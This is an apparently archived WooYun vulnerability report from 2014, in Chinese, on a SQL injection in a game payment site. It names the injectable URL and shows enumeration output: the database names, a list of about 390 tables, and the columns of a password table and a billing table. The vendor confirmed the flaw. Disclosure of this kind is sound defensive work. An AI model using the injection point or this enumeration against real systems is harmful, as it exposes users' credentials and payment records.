乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-04: 细节已通知厂商并且等待厂商处理中 2014-07-04: 厂商已经确认,细节仅向厂商公开 2014-07-14: 细节向核心白帽子及相关领域专家公开 2014-07-24: 细节向普通白帽子公开 2014-08-03: 细节向实习白帽子公开 2014-08-18: 细节向公众公开
rt
注入点:
http://pay.5see.com/Pay/LyPay?gameid=wycq
数据库:
available databases [3]:[*] information_schema[*] test[*] vxgametv
Database: vxgametv[390 tables]+---------------------------------+| ad_gun_list || admin_login_log || admin_rollback || admindonelog || admindonetype || agent_bill || agent_chongka_ticheng || agent_login_log || agent_moneylog || agent_ticheng_pay_list || agent_zhuchi || agenttichengtype || auth_auser || auth_auser_bk || auth_group || auth_group_permissions || auth_message || auth_permission || auth_session || auth_session_log || auth_session_log_old || auth_session_stat || auth_session_stat_0615 || auth_session_view || auth_session_view_basic || auth_user || auth_user_groups || auth_user_user_permissions || b_advice || b_re_advice || bank_list_05 || bankcoin_log_stat || bill || bill_waika || blackmyname || card_agent || card_agent_getback_bklist || cardlogin_log || cards || cards_changename || cards_cread_log || cards_event || cards_list_100 || cards_list_1000 || cards_list_500 || cards_list_vip || cards_product || cards_storage || cards_storage_log || cargame_tj || cargame_tj_old || carrobot_list || category || chargesubmit || chargesubmit_waika || chatavatar || coin_control_otherthing || coin_jifen_statistics || coin_log_stat || coin_score_daily || coinauth || cross_online_stat || ddlchangelog || django_content_type || django_session || django_site || dynaic_page || egg_config || egg_config_gift_list || egg_degree_level || egg_eventscore || egg_get_log || egg_gift_list || egg_hit_log || egg_owner || error_log || event1_chooseteams || event1_teamgroups || event1_teams || event_awardlist || event_dance_list || event_dance_list_log || event_list || event_lottery || event_survey || event_type || event_yuanxiao || exchange || exchange2 || exchange_old || exchange_old_140408 || exchangetime || filter || flash || flashclass || flashgame || game_gifts || game_intro_admin || game_intro_list || game_intro_pay_list || game_intro_task || game_intro_uid_log || game_intro_uid_temp || game_pay_rate_list || game_server_list || game_stat || game_uid_ip_list || gamenotices || gamenotices_type || gj_member || gmtv_board || gmtv_members || gmtv_room_ad || gmtv_room_favorites || gmtv_room_group || gmtv_room_link_group || gmtv_room_sign || gmtv_server_config || gmtv_update || gmtv_update2 || gmtv_user_stat || gmtvbankcoin || gmtvbankcoinlog || gmtvcoin || gmtvcoinlog || gmtvcoinlog_05_bk || gmtvcoinlog_1304 || gmtvdegree || gmtvdegreelog || gmtvniuniuscore || gmtvniuniuscorelog || gmtvroomcoin || gmtvroomcoinlog || gmtvroomscore1303 || gmtvroomscore1303log || gmtvroomscore1304 || gmtvroomscore1304log || gmtvroomscore1305 || gmtvroomscore1305log || gmtvroomscore1306 || gmtvroomscore1306log || gmtvroomscore1307 || gmtvroomscore1307log || gmtvroomscore1308 || gmtvroomscore1308log || gmtvroomscore1309 || gmtvroomscore1309log || gmtvroomscore1310 || gmtvroomscore1310log || gmtvroomscore1311 || gmtvroomscore1311log || gmtvroomscore1312 || gmtvroomscore1312log || gmtvroomscore1401 || gmtvroomscore1401log || gmtvroomscore1402 || gmtvroomscore1402log || gmtvroomscore1403 || gmtvroomscore1403log || gmtvroomscore1404 || gmtvroomscore1404log || gmtvroomscore1405 || gmtvroomscore1405log || gmtvroomscore1406 || gmtvroomscore1406log || gmtvroomscore1407 || gmtvroomscore1407log || gmtvroomscore1408 || gmtvroomscore1408log || gmtvroomscore1409 || gmtvroomscore1409log || gmtvroomscore1410 || gmtvroomscore1410log || gmtvroomscore1411 || gmtvroomscore1411log || gmtvroomscore1412 || gmtvroomscore1412log || gmtvscore || gmtvscorelog || help || help_class || host_award_type || host_aword_player || host_player_sign_up || host_score || host_score_item || host_vote || ht_page_login_list || ht_pay_list || ht_tui_statistic_list || ip_merge || ktv_board || ktv_members || ktv_room_ad || ktv_room_favorites || ktv_room_group || ktv_room_link_group || ktv_room_sign || ktv_room_type || ktv_room_type_relevance || ktv_server_config || ktv_update || ktv_update2 || ktv_user_stat || ktvrooms || link || liveroom || lockinfo || ly_enabled_ip || ly_game_cards || ly_game_playlog || ly_game_servers || ly_games || member || member_131218 || member_blockip || member_blockipsegment || member_cert || member_changescore_log || member_coin_score_sum_month || member_consumepoint || member_daheng_details || member_daixin_zhuchi || member_device || member_device_more || member_index_tj || member_intro_0709 || member_intro_ly_0621 || member_introducer || member_introducer_log || member_introducer_login_log || member_introducer_placeid_ratio || member_introducer_temp_t0 || member_level_type || member_login_room || member_masterscore_bk || member_money_day_list || member_not_display || member_null_cnt || member_own || member_phoneqqsina || member_qq || member_registerip || member_robot || member_scorelog || member_site_level || member_statistics || member_statistics_zhuchi || member_test || member_than1700 || member_tui_admin || member_tuistatistics || member_tuistatistics2 || member_tuistatistics_not_ratio || member_tuistatisticste || member_tuistatisticste2 || member_updengji_stat || member_usedcard_record || member_usedcard_record_month || member_useddate || member_zhuchi || member_zhuchi_details || membercheackip || menu1 || menuright1 || mm_admin || mm_album || mm_album_good || mm_albumcomment || mm_albumreply || mm_auser_list || mm_category || mm_follow || mm_guestbook || mm_guestbookreply || mm_info || mm_mood || mm_moodcomment || mm_moodcomment_reply || mm_photo || mm_show_album || mm_show_banner || mm_show_user || mm_uservisited || multiroom || multiroom1 || multiroom_renqi || multiroom_statistics_new || ngame_authoperates || ngame_games || ngame_gameservers || ngame_gametypes || ngame_introinfo || ngame_introtuiguang || ngame_introtuigurl || ngame_introtype || ngame_introusers || ngame_managers || ngame_menugroups || ngame_menus || ngame_normalusers || ngame_rolepowers || ngame_roles || ngame_ticdetail || ngame_ticscheme || notice || notice_type || number_segment || pay_cards || pay_cards_log || pay_cards_stat || pay_cards_type || pay_channel || pay_channel_use || pay_coin || pay_list || pay_list_1401 || pay_list_xs || pay_monthly || pay_monthly_log || pay_type || phone_advs || plat_event_list || plat_event_nangua || plat_events || platform || qianmoneylog || real_exchange || real_returnchangecode || real_returncode || remotelog_application || remotelog_logmessage || rooms_popularity_day || rpt_cards_daily || rvdb_member || saleusers || score_log_stat || seee_room_group || seee_room_link_group || seee_server_config || servers || shengzhouxing_bill || siting_config || sqlmapoutput || st_applist || st_apptypes || st_default_event || st_platforms || st_user_event || statistic_platform || sys_monitorchangelog || sysdiagrams || syslog || system_admin || system_adminpermissions || system_creaduser_log || system_menufather || system_permissions || tableidcontrol || tableidcontrol_game || tb_pro_city || tb_sales_detail || tehao || tehao_new || tehao_vip_yin || temp_lydd || temp_psdid || tenroom_userinfo || tg_qq_url_list || tip_client || tmp2 || tmp_active_zc || tmp_active_zc2 || tmp_coinless100 || tmp_coinless100_group || tmp_shell || tmp_shell2 || trade_recover_log || tui_zhuang_log || tuigliveroom || u766_room_group || u766_room_link_group || u766_server_config || user_block_reason || user_frver_list || user_machine || user_machine_block || v_introusers || zhuchi_score_month || zhuchi_shelldaystatistic |+---------------------------------+
某几张表:
Database: vxgametvTable: member_qq[5 columns]+------------+-------------+| Column | Type |+------------+-------------+| createtime | timestamp || pwd | varchar(64) || qqopenid | varchar(32) || src_type | varchar(20) || useridx | bigint(22) |+------------+-------------+
Database: vxgametvTable: bill[13 columns]+----------+---------------+| Column | Type |+----------+---------------+| Amount | decimal(18,2) || b_id | int(11) || billno | varchar(50) || cardtype | varchar(10) || coin | bigint(20) || date | char(14) || kbillno | varchar(30) || masterid | varchar(20) || Memo | varchar(255) || paydate | datetime || PayWay | varchar(20) || succ | varchar(1) || UserID | varchar(20) |+----------+---------------+
只是做了一下测试。
信息太多了,你们赶快修复吧。不然问题可就大了。
危害等级:高
漏洞Rank:18
确认时间:2014-07-04 12:13
已经提交相关人员修改,对注入一直没有重视
暂无